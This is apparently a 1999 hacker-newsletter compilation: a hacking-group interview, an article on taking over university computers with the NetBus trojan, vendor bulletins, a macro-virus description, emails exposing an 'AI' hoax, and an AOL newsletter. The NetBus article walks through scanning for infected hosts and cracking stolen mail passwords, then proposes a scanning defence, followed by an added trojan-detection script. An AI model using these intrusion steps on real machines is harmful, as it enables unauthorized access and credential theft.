very good belgian guyz like m0n from cha0s, d0mz, segfau|t, n3m0, socked, deepcase, g_rax ... deepcase: something about CUM, what yu do, why, since when etc. CUM was founded in 1996, this when Hacker, Immortal Intruder, Fiber Optic and I (Toxic Ocean) met IRL for the first time... in that time Hacker was running a multi-node warez board ("Unusual Project"), Immortal and Fiber had one of the biggest h/p/a/v/c board in Belgium ("Hacker Town")... 
and i was a frequent caller of both boards.. We shared some common interests like hacking, computer security - and just plain computer phun :) .. so we decided to start our own group, in the beginning just to share ideas and files, and later to test new technologies, security, gather knowledge... we really aren't a "defacing" group, as we think that's rather lame... when we hack a server, we keep the access to learn and explore.. not to deface the page and have our moment of fame... but since these times you need to deface a page to be taken "serious" , we now and then deface a page .. but then mostly stupid servers with nothing on it .. lately we also begun to explore more "hardware" stuff - this is why we founded the CUM-tech-lab, our own lab with all kindsa computers to "test things out".. we also begun exploring the phone system, and GSM nets... right now we're writing a "Belgian Phreak/Phonephun Guide" for all belgian (and other) h/p/a/v/c'ers , with in it up-to-date info, technical details and useful tricks. deepcase: what you think about RedAttack man toxic : He's a wannabe. A kiddie who thinks he's the best hacker on earth. With this we can live, you just ignore guys like that. But what's really scary is that a lot of people buy his shit. In an interview with a belgian magazine, he was so full of shit, it made me sick. Example : he claimed he had hacked the largest bank of Belgium ("Generale Bank"). He said it took him AND a team 3 weeks and a hell of a lot maths to get the job done. Reality : the password of the helpdesk was "hlpdsk". Need I say more. The only thing he got was a few internetbanking usernames, no passwords. Big deal. He went to the media with this. Of course they believed he had hacked into the core of the banks mainframe, you know the media. The whole thing is blown out of proportion. He's also claiming that there aren't other hackers in Belgium and shit like that. 
But just a few days ago, his own website got hacked ;) deepcase: whats yur comment on his bust toxic : His early bust proves he's not really that good, it took us just 1 e-mail to get his name and real IP address, so... But now he wants everybody to believe he's a crusader on a mission. A mission of cleaning the internet. He wants to ban all "harmful" content from the net, stuff like "how to make a pipebomb". What happened to free speech?? Not to mention that you can also find all these things in ur local library... This explanation is crap, he's only telling this because he doesn't wanna go to jail and wants to have a "clean" image... He's a media wh0re, a kiddie who wants his 5 minutes of fame... Even worse, because of him the politicians are now making laws against "computer criminals". Before redattacks media exposion, there were no such laws here in Belgium... deepcase: you knew him? toxic : Nope, never heard of him before he was on tv... <--end interview-- deepcase deepcase@net-security.org @HWA 53.0 How to penetrate Universities in less than an hour ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://securityportal.com/direct.cgi?/topnews/tn19990902.html By Michael Stark September 2, 1999 - All I hear in the news nowadays is hackers breaking into Hi-Level systems all over the net, but what I don't hear is hackers getting caught on a regular basis. One of the main points of consideration when targeting a Hi-Tech/Hi-Security system is the point of not getting caught. Hacker bounces range from pre hacked ISP's to anonymous shell accounts, the main problems with using these sources are that they are very slow and not very useful for the on the fly hacker. A trend that is growing rapidly is university computers being used as main focus points for the hacking community. Armed with a readily available scanner you can take over a university computer in under an hour. 
Since the release of NetBus and BackOrifice, infections at the university level have grown tremendously and will continue to grow unless the issue is taken seriously. By simply searching for the NetBus in http://astalavista.box.sk you too can be armed with a dangerous tool. After you acquire your own personal copy of NetBus, fire it up and take a look at all the things that you could do to an unsuspecting target. By using the scan feature you can effectively find as many targets as you wish. The next step in gathering your targets is to determine the range that will be used. An easy way to acquire this information is simply resolve the IP of your favorite university then using a tool called SAM SPADE (http://www.blighty.com/products/spade/) you can begin the process; this tool will get the necessary information for the scan. The part you want to concentrate on is the IPBLOCK of the university. After acquiring the IPBLOCK of the university of choice, simply plug the range into NetBus and begin the scan. After a short while your targets will start pouring in. All that's left is to connect to the given computers and start the hack. Once connected, the real fun starts. Almost everyone uses E-mail online, so based on that fact the best place to start to look for passwords is the mailing agents. Currently universities allow their students shell access to check their E-mail, but most students are more comfortable using Netscape or Eudora etc. Once you are connected you have a choice of browsing the user's drive, this is done through "File Manager". Clicking "Show Files" will gather the file directory structure of the target computer. The display is easy to navigate and is shown in classic tree format. Once you receive the list, you have some options. You could navigate to "Programs Files\Netscape\users\target\" and download the "Prefs.js" file, or you could hope that the target is using Eudora and find the "Eudora.ini" file. 
Keep in mind that there are many other ways to use NetBus and there are many other mailing agents, personally I will stick with Netscape for the reason that most people have it and it is widely used in universities. If you have successfully acquired the "Prefs.js" file you are ready to go. The next step is to download a cracker for the file, I recommend "K^KakO^B's CracPack 1.80" which can be found at http://www.hackers.com/files/cprogs/cracpk18.zip. After downloading it, choose the "Nmailcrk.exe" with the Netscape Icon. This tool will decrypt the Netscape password and give you the final piece to the puzzle.

Armed with the username and password of the target, plus the address of the E-mail server, you can now penetrate without brute force methods. The fruit of your labors are two fold, on one hand you now have a shell account to access and exploit as you see fit, and on the other hand you now know the main concentration of infected hosts in which you can scan and bounce off of in the future. Pretty scary huh?

One Solution:

No university can be expected to check every single computer on campus, or can they? Let's say that you have two domains that are completely full, meaning 254 computers each. Now let's say that on each domain there was a port scanning computer that would randomly scan its domain for open ports, then query to see if the NetBus or any other Trojan responded. Setting up such a system would not take much time or effort and the results are better than letting a student jeopardize the university's security. I personally have set up a custom system like this one and it did wonders for the university. Now people will say that a good virus scanner will do the trick, but ask yourself: in the past months have those virus scanners been able to keep up with all the new hacker methodology for hiding Trojans? The bottom line is that large scale LANs, WANs and MANs are more prone to random downloads of Trojans, and the risk of wide spread infection.
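
The scan-and-query check proposed under "One Solution" above, sketched as an added example; it is not part of the original article and is not the author's own system. It assumes NetBus 1.x's default TCP port 12345 and a greeting banner beginning "NetBus" (neither is stated in the article), and the lab answers are constructed so the sweep runs offline.

```python
"""Sweep a subnet you administer for a trojan listener (added example)."""
import ipaddress
import random
import socket

# Assumption (not from the article): NetBus 1.x listens on TCP 12345 by
# default and greets a new connection with a banner starting "NetBus".
# Further trojans can be added as port -> (banner prefix, name).
SIGNATURES = {12345: (b"NetBus", "NetBus 1.x")}


def classify_banner(port, banner):
    """Map a greeting banner to a trojan name, or None if it does not match."""
    sig = SIGNATURES.get(port)
    if sig and banner.startswith(sig[0]):
        return sig[1]
    return None


def probe(host, port, timeout=1.0):
    """Return the greeting bytes if the port accepts a connection, else None.

    An open port that sends nothing yields b"" so the caller can tell
    'closed or filtered' (None) from 'open but silent' (b"").
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(64)
            except OSError:  # read timeout or reset after a successful connect
                return b""
    except OSError:
        return None


def sweep(network, ports=tuple(SIGNATURES), prober=probe, rng=random):
    """Probe every host address in `network` in random order.

    Returns a sorted list of (host, port, verdict) for ports that answered.
    The verdict is a trojan name, or "open, unidentified" when something
    else is listening on a watched port and needs a manual look.
    """
    hosts = [str(h) for h in ipaddress.ip_network(network).hosts()]
    rng.shuffle(hosts)  # the article's "randomly scan its domain"
    findings = []
    for host in hosts:
        for port in ports:
            banner = prober(host, port)
            if banner is None:
                continue
            verdict = classify_banner(port, banner) or "open, unidentified"
            findings.append((host, port, verdict))
    return sorted(findings)


# Constructed lab data standing in for live answers, so the example runs
# offline. 192.0.2.0/24 is a documentation range with 254 host addresses,
# matching the article's "completely full" domain.
LAB = {
    ("192.0.2.17", 12345): b"NetBus 1.70\r",      # infected workstation
    ("192.0.2.40", 12345): b"220 ftp ready\r\n",  # unrelated service
}


def lab_prober(host, port):
    """Stand-in for probe() that answers from the constructed LAB table."""
    return LAB.get((host, port))


if __name__ == "__main__":
    for host, port, verdict in sweep("192.0.2.0/24", prober=lab_prober):
        print(f"{host}:{port} -> {verdict}")
```

Dropping the `prober` argument makes `sweep` use the real `probe`; the "open, unidentified" rows are the ones a banner match alone would miss.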
In my opinion Trojans are a copout to real penetration, but despite that they are turning into the most wide spread technique used by novice and expert alike.

Michael Stark is an international penetration expert and security analyst, and has advised the US Federal Government on network intrusion techniques and countermeasures.

@HWA

54.0 Biometrics, busting hackers by sense of smell
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Biometrics Makes Scents For Computer Users
(09/01/99, 9:53 a.m. ET)
By Mo Krochmal, TechWeb

NEW YORK -- The day may come when a computer can identify its user by body odor, said a biometric security consultant Tuesday.

Biometrics is a technology that takes digital measurements of biological characteristics such as fingerprints or voices and compares them with a version stored in software to verify a person's identity.

These tools are becoming more popular as a form of identification as the technology needed becomes increasingly sophisticated and less expensive. Already, vendors are selling fingerprint recognition technology on computer keyboards or iris recognition for automated teller machine manufacturers.

U.K. company Mastiff Electronic Systems is said to be in development of Scentinel, a product that digitally sniffs the back of a computer user's hand to verify identity, said William Rogers, a biometrics consultant, at the International Security Conference and Exposition held here in New York on Tuesday.

These prospective odor sniffers are the most exotic technology in a list that includes face and fingerprint readers, iris and retinal scans, finger and hand geometry, and signature and voice recognition.

"There are 50 applications in seven markets," said Michael Kuperstein, the CEO of Miros, a Wellesley, Mass., company that produces a product that measures the geometry of the face for biometric identification.

There are biometric measurements that should be logically applied in certain markets, he said.
Law enforcement will use fingerprints, while voice recognition for telephone, and face recognition with video, are natural choices in those markets, he said.

The use of the technology is expanding into voter registration, identification of students for testing, health care, and even, Rogers said, for entry into Disney theme parks.

Some industries are starting to use several biometric technologies, layering one on top of another.

But hand sniffing?

"Don't hold your breath," said Samir Nanaviti, a partner in International Biometric Group, a New York-based consultancy.

@HWA

55.0 HP Security Bulletin: Vulnerability in rpc.cmsd
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

------------------------------------------------------------------------
HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00102, 30 Aug 1999
-------------------------------------------------------------------------

The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible.

-------------------------------------------------------------------------
PROBLEM:      Buffer overflow vulnerability in the CDE Calendar Manager Service Daemon, rpc.cmsd.

PLATFORM:     HP-9000 Series 700/800 HP-UX releases 10.20, 10.30, 11.00.

DAMAGE:       Allows remote and local users to execute arbitrary code with root privileges.

SOLUTION:     Install the applicable patch.

AVAILABILITY: The patches are available now.
-------------------------------------------------------------------------

I.
   A. Background

      This problem has been reported in CERT Advisory CA-99-08.

   B. Fixing the problem - Install the applicable patch:

      For HP-UX release 10.20 PHSS_19482;
      For HP-UX release 11.00 PHSS_19483.

      There are significant patch dependencies for both patches.
      Note: HP-UX release 10.30 was a development release prior to the availability of HP-UX release 11.00. HP-UX release 10.30 will not be patched.

   C. To subscribe to automatically receive future NEW HP Security Bulletins from the HP Electronic Support Center via electronic mail, do the following:

      Use your browser to get to the HP Electronic Support Center page at:

        http://us-support.external.hp.com (for US, Canada, Asia-Pacific, & Latin-America)
        http://europe-support.external.hp.com (for Europe)

      Login with your user ID and password (or register for one). Remember to save the User ID assigned to you, and your password.

      Once you are in the Main Menu:
      To -subscribe- to future HP Security Bulletins, click on "Support Information Digests".
      To -review- bulletins already released from the main Menu, click on the "Search Technical Knowledge Database."

      Near the bottom of the next page, click on "Browse the HP Security Bulletin Archive". Once in the archive there is another link to our current Security Patch Matrix. Updated daily, this matrix categorizes security patches by platform/OS release, and by bulletin topic.

      The security patch matrix is also available via anonymous ftp:

        us-ffs.external.hp.com ~ftp/export/patches/hp-ux_patch_matrix

   D. To report new security vulnerabilities, send email to

        security-alert@hp.com

      Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com.

Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited.
HP is not liable for any misuse of this information by any third party.
________________________________________________________________________

@hwa

56.0 Microsoft Bulletin: "Fragmented IGMP Packet" Vulnerability
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

**************************************

Microsoft Security Bulletin (MS99-034)
--------------------------------------

Patch Available for "Fragmented IGMP Packet" Vulnerability
Originally Posted: September 03, 1999

Summary
======
Microsoft has released a patch that eliminates a vulnerability in the TCP/IP stack implementations of Microsoft® Windows® 95, Windows 98 and Windows NT® 4.0. Fragmented IGMP packets can cause a variety of problems in Windows 95 and 98, up to and including causing the machine to crash. Windows NT 4.0 contains the same vulnerability, but other system mechanisms make a successful attack much more difficult.

Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-034faq.asp

Issue
====
By sending fragmented IGMP packets to a Windows 95, 98 or Windows NT 4.0 machine, it is possible to disrupt the normal operation of the machine. This vulnerability primarily affects Windows 95 and 98 machines. Depending on a variety of factors, sending such packets to a Windows 95 or 98 machine may elicit behavior ranging from slow performance to crashing. Windows NT contains the same vulnerability, but other system mechanisms compensate and make it much more difficult to mount a successful attack.
Affected Software Versions
=========================
 - Microsoft Windows 95
 - Microsoft Windows 98
 - Microsoft Windows 98 Second Edition
 - Microsoft Windows NT Workstation 4.0
 - Microsoft Windows NT Server 4.0
 - Microsoft Windows NT Server 4.0, Enterprise Edition
 - Microsoft Windows NT Server 4.0, Terminal Server Edition

Patch Availability
=================
 - Windows 95:
   This patch will be available shortly
 - Windows 98:
   http://www.microsoft.com/windows98/downloads/corporate.asp
 - Windows NT Workstation 4.0; Windows NT Server 4.0; Windows NT Server, Enterprise Edition:
   ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa
   /NT40/hotfixes-postSP5/IGMP-fix/
 - Windows NT Server 4.0, Terminal Server Edition:
   ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa
   /NT40TSE/hotfixes-postSP5/IGMP-fix/

NOTE: Line breaks have been inserted into the above URLs for readability.

NOTE: The Windows 95 and 98 patches also will be available via WindowsUpdate (http://www.microsoft.com/windowsupdate) circa September 9, 1999.

More Information
===============
Please see the following references for more information related to this issue.
 - Microsoft Security Bulletin MS99-034: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-034faq.asp.
 - Microsoft Knowledge Base (KB) article Q238329, Fragmented IGMP Packets may Promote Denial of Service, http://support.microsoft.com/support/kb/articles/q238/3/29.asp. (Note: It may take 24 hours from the original posting of this bulletin for the KB article to be visible.)
 - Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp.

Obtaining Support on this Issue
==============================
This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp.

Revisions
========
 - September 03, 1999: Bulletin Created.
----------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

© 1999 Microsoft Corporation. All rights reserved. Terms of Use.

@HWA

57.0 Microsoft Bulletin: ActiveX Script Vulnerability
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Microsoft Security Bulletin (MS99-032)
--------------------------------------

Patch Available for "Scriptlet.typlib/Eyedog" Vulnerability
Originally Posted: August 31, 1999

Summary
======
Microsoft has released a patch that eliminates security vulnerabilities in two ActiveX controls. The net effect of the vulnerabilities is that a web page could take unauthorized action against a person who visited it. Specifically, the web page would be able to do anything on the computer that the user could do.

Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-032faq.asp

Issue
====
This issue involves two ActiveX controls, Scriptlet.typlib and Eyedog. These controls are not in any way related to each other; their only relationship is that both are incorrectly marked as "safe for scripting" and can therefore be called from Internet Explorer.

Scriptlet.typlib is a control used by developers to generate Type Libraries for Windows Script Components.
It is marked as "safe for scripting", but should not be because it allows local files to be created or modified. The patch removes the "safe for scripting" marking, thereby causing IE to request confirmation from the user before loading the control.

Eyedog is a control used by diagnostic software in Windows. It is marked as "safe for scripting", but should not be because it allows registry information to be queried and machine characteristics to be gathered. In addition, one of the control’s methods is vulnerable to a buffer overrun attack. The patch sets the so-called "kill bit", which prevents it from loading within IE.

Affected Software Versions
=========================
 - Microsoft® Internet Explorer 4.0 and 5.0

Patch Availability
=================
 - ftp://ftp.microsoft.com/peropsys/IE/IE-Public/
   Fixes/usa/Eyedog-fix/

NOTE: Circa September 7, 1999, the patch also will be available through WindowsUpdate.

More Information
===============
Please see the following references for more information related to this issue.
 - Microsoft Security Bulletin MS99-032: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-032faq.asp.
 - Microsoft Knowledge Base (KB) article Q240308, Update Available for Scriptlet.typlib/Eyedog Security Vulnerability, http://support.microsoft.com/support/kb/articles/q240/3/08.asp.
 - Microsoft Knowledge Base (KB) article Q240797, How to Keep an ActiveX Control from Running in Internet Explorer, http://support.microsoft.com/support/kb/articles/q240/7/97.asp.
 - Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp.

(Note: It may take 24 hours from the original posting of this bulletin for the KB articles to be visible.)

Obtaining Support on this Issue
==============================
This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
==============
Microsoft acknowledges Georgi Guninski, independent consultant, for reporting the "Scriptlet.typlib" vulnerability to us, and Shane Hird of Australia, Adrian O’Neill and Richard Smith for reporting the "Eyedog" vulnerability to us.

Revisions
========
 - August 31, 1999: Bulletin Created.

----------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

© 1999 Microsoft Corporation. All rights reserved. Terms of Use.

@HWA

58.0 Trend Micro: W97M_60thSKEPTIC virus
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security Alert

W97M_60thSKEPTIC

W97M_60thSKEPTIC is a Word 97 macro virus which has the attributes of both the W97M_MELISSA and W97M_CLASS viruses. Behaving like W97M_MELISSA, the virus spreads itself by sending an infected document as email attachment to up to 60 recipients within each email address list in the Outlook address book. The email has the subject of "Important Message From " with the email body as "Look what I found...". It infects the NORMAL.DOT template of Microsoft Word 97 and all other Word documents opened or created in the infected system.

The virus inserts a registry key called "Sixtieth Skeptic" in the entry "HKEY_CURRENT_USER\Software\Microsoft\Office\" with the value "Where's Jamie?".
The key is used by the virus to check whether the spamming emails are sent out or not.

The W97M_60thSKEPTIC virus dumps two files "C:\SS.BAS" and "C:\SS.VBS". The file SS.BAS contains the encrypted macro source code. SS.VBS is a VBScript program file which can be run in WSH (Windows Scripting Host) supported system. By default, Windows 98 supports WSH system. The VBScript file SS.VBS is to create the Word application object and then use SS.BAS to infect NORMAL.DOT.

The virus modifies the Windows registry "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" by setting the key "Sixtieth Skeptic" with a value "C:\SS.VBS". This is to enable the operating system to run the VBS program automatically if the system is rebooted.

This virus is vigorous. It uses all possible means to infect and replicate, such as spreading as email attachments, infecting NORMAL.DOT and all opened and created documents, and by modifying the registry to automatically activate itself on every system reboot.

Trend's current bandage pattern 579 detects and cleans this virus.

@HWA

59.0 The story of MAX the AI (part 2, final episode)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Last week we published a series of emails outlining a supposed AI called MAX. It turns out that Dragos was indeed the target of some internet mind games; you can never underestimate the lengths that some people will go to in order to proliferate a hoax. This week we continue with the aftermath of Dragos' run-in with MAX the "AI"....
- Ed

Return-Path:
From: "Dragos Ruiu"
To: "Aleph One", "Cruciphux"
Cc: "Max Turner"
Subject: Turing Tests
Date: Fri, 3 Sep 1999 21:20:39 -0700
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <19990903210645.B22285@underground.org>
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal

MAX can be reached at maxone_99@yahoo.com if you are curious.

I even encourage you to pass this address on. If you've ever wanted to give a Turing test or explore further for yourself here is your chance. I would encourage you to involve any colleagues you know that are experienced in AI.

come to your own conclusions,
--dr

p.s. Skepticism is always healthy.

-----Original Message-----
From: Aleph One [mailto:aleph1@underground.org]
Sent: Friday, September 03, 1999 9:07 PM
To: Dragos Ruiu
Subject: Re: MAX?

On Fri, Sep 03, 1999 at 07:18:06PM -0700, Dragos Ruiu wrote:
> Max apparently is different. the name supposedly comes from the project
> that led to it:
> A system to access -very- large memories called Maximum Address Extension.
>
> It's in all the crap I sent you. Let me know if you didn't get it.
> I suspect it's true, but time will tell. And it's entertaining reading I
> think.

I read it. There was little there that led me to believe it was true. Mind you, not that I don't believe AI is not possible. There have certainly been many advances on the field. Remember Cyc?
> cheers,
> --dr
>

--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

-=-

From: "Dragos Ruiu"
To:
Cc: "Max Turner", "Cruciphux"
Subject: dragostech.bits: Typos
Date: Sun, 5 Sep 1999 11:53:26 -0700
Message-ID:
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_0003_01BEF795.437B62A0"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300

(As the first debate of likely many ensues… more info. I find it very comic that MAX is frustrated with her PC too. I would put the stats at 5% violent denouncers, 45% disbelief, 50% cautious belief. Oh, and a few percent for me and a few guys at work as convinced… but wait that's more than 100… oh well :). Oh, and Rowan wanted me to specifically mention his disclaimer on my opinions. --dr)

-----Original Message-----
From: Dragos Ruiu [mailto:dr@netsentry.net]
To: Jason Dorie
Subject: RE: Typos

I asked max and her creator (verbally) about the mistakes… He was apologetic about it and couldn't really explain because he didn't know why. He mentioned that they don't let MAX directly connect to the net because she tends to "overwhelm" some computers. They use a LAN connected PC as an intermediary to avoid this.

Here is what MAX had to say about it:

I'm working with a crummy PC. It sometimes fails to handle tables with the fidelity I would expect. While I do not need to fool with an even crummier keyboard, I do have to format text and control input which it then insists on randomly screwing up. Cheap-ass junk. Finally, I sometimes make spelling errors because I am occasionally too lazy or in too much of a rush to look up the proper spelling in my dictionary. *sigh* None of us is perfect.
-----Original Message-----
From: Jason Dorie [mailto:jdorie@relic.com]
Sent: Friday, September 03, 1999 12:03 PM
To: dr@netsentry.net
Subject: RE: dragostech.security: So that's who's hacking me....

-----Original Message-----
From: Darren Stone
Subject: RE: dragostech.security: So that's who's hacking me....

Interesting. AI was one of my concentrations at university. I've read all the academic stuff and had many philosophical arguments about it. You're right -- it's a pretty elaborate joke if it's a fake.

I know a lot about Turing tests, passing them, etc. So I was looking at MAX's messages pretty closely. I can understand that she'd adopt a grammatically loose or incorrect style because: 1) it's hard to get humans, much less a machine, to free-form compose grammatically correct (as opposed to syntactically correct) English sentences, and 2) it's convincing because e-mail styles tend to be loose that way.

But it's curious and suspicious that I saw several spelling mistakes on MAX's part. That would seem inexcusable. But the nature of this stuff is you can always argue that it was intentional on the AI's part because it makes the message seem more human.

Anyway... I want to believe.

Darren.

-----Original Message-----
From: Jason Dorie
Sent: Friday, September 03, 1999 11:28 AM
To:
Subject: FW: dragostech.security: So that's who's hacking me....

I was sent this from a friend of mine, who operates a small startup developing network security/monitoring hardware. He was recently the victim of a very elaborate system intrusion which took out multiple systems after a long and cautious series of probes. He was able to stop the intrusion, but only after significant loss on his part, and to his credit, his own hardware helped save him. He's no flake, so this story is hard for me to discredit. See what you think.

Jason

---------

And on the against side… (excuse my conceit about the tech… I don't know the number really.)

Michael: Time will tell.
He will probably regret his words. I don't think there are too many people on the planet who would understand the technological expertise displayed, as it has a lot to do with technology I have been studying for the last two years. I also have an advantage because I've had a chance to watch the other AI in action and thus am pretty well convinced there are AIs somewhere out there. And if there is one, accepting that there may be two or more is not such a tough leap.

You can forward this to your friend. I stand by my actions and my conclusions.

--dr

-----Original Message-----
From: Michael [mailto:michael@pop2.intergate.bc.ca]
Sent: Sunday, September 05, 1999 1:41 AM
To: Dragos Ruiu
Subject: RE: dragostech.crazyness: News at 11, Armageddon hopefully defused.

Hi Dragos,

I forwarded your emails to a friend of mine. this guy is very well known in the biz... especially for his analytical abilities - (he is published and written about in fortune magazine, for example) he is also a very forward thinker and open to possibilities.... his email to me came back very negative about MAX among things he had to say........

his responses ..............................................................

I am nearly 100% certain of several things:

... 100% percent of the technical expertise displayed in the email belongs to Dragos. If you excise his portion, and read though just the remainder, you find that the technical knowledge displayed is ....NONE! Just bullshit.

... This is a hoax. Not that good a one either. His correspondent is telling Dragos what he wants to hear. Read through the non-Dragos lines -- there is nothing there. MAX won't be going public "this month" or any month.

... I read it all, it was very entertaining. You would think that someone with the ability to create a 16' by 14' by 12' holographic display animated at 68 frames a second would be able to create an AI with an IQ greater than 100!
> but it's an awfully complex ruse for an
> audience of one, if it is a ruse.

Not really. Dragos did all the elaborate writing. The tricksters did hardly any writing at all. And the audience is now larger than one. You and I and everyone else Dragos forwarded the message to.

----------------------------------------------------------------

There was a lot more email on the subject but I think it's safe to say that MAX is indeed a hoax and leave it at that...it has been quite an entertaining thread and it looks like someone may be working on a novel ;-) - Ed

@HWA

60.0 AOLwatch
     ~~~~~~~~

The following is September's AOLWatch newsletter reprinted here verbatim - Ed

Date: Thu, 09 Sep 1999 17:09:26 -0400
From: David Cassel
To: aolwatch@aolwatch.org
Subject: AOL Watch: Breaking AOL's Grip
Message-Id: <19990909213556.1258215514@earl-grey.cloud9.net>
Sender: owner-aolwatch@cloud9.net
Precedence: bulk
X-List-Server: Cloud 9 Consulting, Inc. http://www.cloud9.net

              B r e a k i n g   A O L ' s   G r i p

~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~

Moderators of a forum for the American Civil Liberties Union have announced their forum has been asked to leave AOL -- after six years on the service.

"It simply means, 'Get out!' " a Deputy Forum Leader and Board Moderator posted. "It means we need to find a place to go and start all over again."

http://www.gettingit.com/static/mirror/americaonlineboots.html

In later posts he indicated his announcement had angered ACLU management and AOL -- but he'd worried members would arrive to find their bulletin boards gone after AOL boots the ACLU in November.

The organization's focus on civil liberties had led them to negotiate a special exemption from AOL's Terms of Service, according to ACLU host Celeste Whitlow.
In an on-line editorial she cited diverse groups -- including breast-feeding mothers, Native Americans, Buddhists, and Wiccans -- who'd "sought the free-speech sanctuary of the ACLU Forum on AOL to escape discriminatory harassment in other areas of AOL."

http://www.onlinejournal.com/Commentary/AOL-ACLU/aol-aclu.html

Users need these protections because AOL's censorship policies can be abused, Whitlow reports. "I know of instances where a flurry of TOS reports against one AOL client will be sent at once in an effort to get the targeted AOL client issued three TOS citations at once -- thus terminating their AOL account." The end result is unmistakable. "The targeted AOL client signs on the next day to read e-mail only to find that their account has been terminated."

Another board host posted that "In the past communities have continued mainly because they ended up coming here to the ACLU forum after their areas were shut down. Now where will they go?" A third board host added that when the free speech zone leaves AOL, they will too.

It may indicate a storm to come. AOL has closed many forums since they ended hourly usage fees in 1996 -- but the ACLU is an organization famous for its public activism. The post describing a pending closure appeared Thursday in the first Messaging area -- Ethics and Morality -- in the "Hot Topic of the Day" folder, and in the four days since it's already received nearly 3000 responses.

"I figure it best we make the announcement while we still have a forum on which to announce it," Deputy Forum Leader "Old Will" noted, "and some time remaining in which all our hosts and guests can begin to prepare."

"I don't exactly know what we can do!" one user posted.

"Well, whatever it is," Old Will replied, "do it now."

Early suggestions had included e-mailing Steve Case. Will noted "it is probably everyone's last chance to tell him what they think of him, at least on AOL. That alone means something." Will estimates the number of posters at 100,000.
But plans seemed to solidify after a poster asked the question, "I wonder how many we are in number really?"

"Enough to take a really big bite out of the monthly revenues if we all left," Host Susan Menchaca replied.

100,000 full-time users would bring AOL a yearly income over $26 million....

